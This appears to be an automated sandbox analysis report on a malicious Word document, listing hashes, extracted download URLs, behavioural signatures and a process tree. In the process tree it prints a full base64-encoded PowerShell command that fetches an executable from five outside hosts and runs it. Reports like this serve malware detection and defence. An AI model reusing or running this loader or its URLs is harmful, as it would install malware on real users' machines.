Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 06:54
Static task
static1
Behavioral task
behavioral1
Sample
f570f2a49dd0e65daad7fcb4b88b6f82_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f570f2a49dd0e65daad7fcb4b88b6f82_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
f570f2a49dd0e65daad7fcb4b88b6f82_JaffaCakes118.doc
-
Size
460KB
-
MD5
f570f2a49dd0e65daad7fcb4b88b6f82
-
SHA1
4cf2fcd57b6856320e0fa8e41540aee1bd2abccc
-
SHA256
1e98f156e7ed7d59838b17ed0eed92bb7be5aa6ca24adbf309248519638c7567
-
SHA512
ce5eb1c5506fc552932011835f729ec9fe7719fee04cc4364314ee6bb86c1ae5c09d9bfa99aa463b5fe9fa23cd0a9bd839f5ed2bfc283324938b10f63f9f3db9
-
SSDEEP
6144:VOENtkhRuof+qDbk3XWp4gMzSVIhl9EKRDqME4yanMjdn/NQVg+D3Do8oRtxQwvM:VO8khg2wW4g8SVIf51E4K14o8Iuj
Malware Config
Extracted
http://honkytonk-studio.com/Kw0rSq2FAX
http://allaboutpoolsnbuilder.com/ULKMiATT
http://bobvr.com/8GI2mvob6L
http://spathucung.info/KyzWn62
http://precounterbrand.com/UtbBjWRRG
Signatures
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1916 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1656 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1916 WINWORD.EXE 1916 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1916 wrote to memory of 2720 1916 WINWORD.EXE 35 PID 1916 wrote to memory of 2720 1916 WINWORD.EXE 35 PID 1916 wrote to memory of 2720 1916 WINWORD.EXE 35 PID 1916 wrote to memory of 2720 1916 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f570f2a49dd0e65daad7fcb4b88b6f82_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABsADIANwAxADMAOQA9ACgAJwBaADgANwA4ADcAMQAnACsAJwA0AF8AJwApADsAJAByADIAXwA4ADYAMQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABqAF8ANQAwADEAXwAxADMAPQAoACcAaAAnACsAJwB0AHQAcAA6AC8ALwBoACcAKwAnAG8AbgAnACsAJwBrAHkAdABvAG4AawAtAHMAJwArACcAdAB1AGQAaQBvACcAKwAnAC4AYwBvAG0ALwBLAHcAMAByAFMAcQAyAEYAQQAnACsAJwBYAEAAaAB0AHQAcAA6AC8ALwBhAGwAJwArACcAbABhAGIAbwB1ACcAKwAnAHQAcABvAG8AbABzAG4AYgB1AGkAbAAnACsAJwBkAGUAcgAuAGMAJwArACcAbwBtAC8AJwArACcAVQBMAEsATQAnACsAJwBpAEEAVABUAEAAaAB0AHQAcAA6AC8ALwAnACsAJwBiAG8AYgB2ACcAKwAnAHIALgBjAG8AJwArACcAbQAvADgARwBJACcAKwAnADIAbQAnACsAJwB2AG8AYgA2AEwAQABoACcAKwAnAHQAdABwADoALwAnACsAJwAvAHMAcABhAHQAaAAnACsAJwB1AGMAdQBuACcAKwAnAGcALgBpAG4AZgBvACcAKwAnAC8ASwB5AHoAVwBuADYAMgBAAGgAdAB0AHAAOgAnACsAJwAvAC8AcAByACcAKwAnAGUAJwArACcAYwBvAHUAbgB0AGUAcgBiAHIAYQAnACsAJwBuAGQALgBjAG8AbQAvAFUAdABiAEIAagBXAFIAUgBHACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAGwAMQBfADQAOQA0ADcAPQAoACcAawA1AF8AJwArACcAMABfAF8AJwApADsAJABjAF8AOQBfAF8AXwBfADcAIAA9ACAAKAAnADMAJwArACcANwA3ACcAKQA7ACQAbgAwADQANQA0ADAAXwBfAD0AKAAnAFQAJwArACcAOAA5AF8AMAAnACsAJwA2ACcAKQA7ACQAbQA2AF8AXwA5ADYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGMAXwA5AF8AXwBfAF8ANwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEUAMAA4ADYAOQA3ADcAIABpAG4AIAAkAGoAXwA1ADAAMQBfADEAMwApAHsAdAByAHkAewAkAHIAMgBfADgANgAxAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAMAA4ADYAOQA3ADcALAAgACQAbQA2AF8AXwA5ADYAKQA7ACQAVQA3ADgAMwA5AF8AOQBfAD0AKAAnAHMAOAAnACsAJwBfACcAKwAnADIANAA0ADIAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAbQA2AF8AXwA5ADYAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABtADYAXwBfADkANgA7ACQAVQBfADEANQBfADEAPQAoACcAWgAyADcAJwArACcAMwA1ADIAJwArACcAXwBfACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABpADIANgBfADQAMwA1AD0AKAAnAE0ANQA0ACcAKwAnADUAXwA0ADIAJwArACcANgAnACkAOwA=1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD59427fd03c87f4ea22170fd3dadbabd79
SHA116f160fd37b52bc2b4a06e7ea2f5bb1be4583035
SHA25632a614399f262e8e0a1ea776693781a73d7d7f4416bacfc8f35f987d9ee5b41e
SHA512cd8e5e50df935edf2d02a2465a75eb253e75a85a7ee73aa4aefaf98386a00b18ca0c57ef596f1157aed504947b19eb97502b3c5d9fd35b88575324387f65d756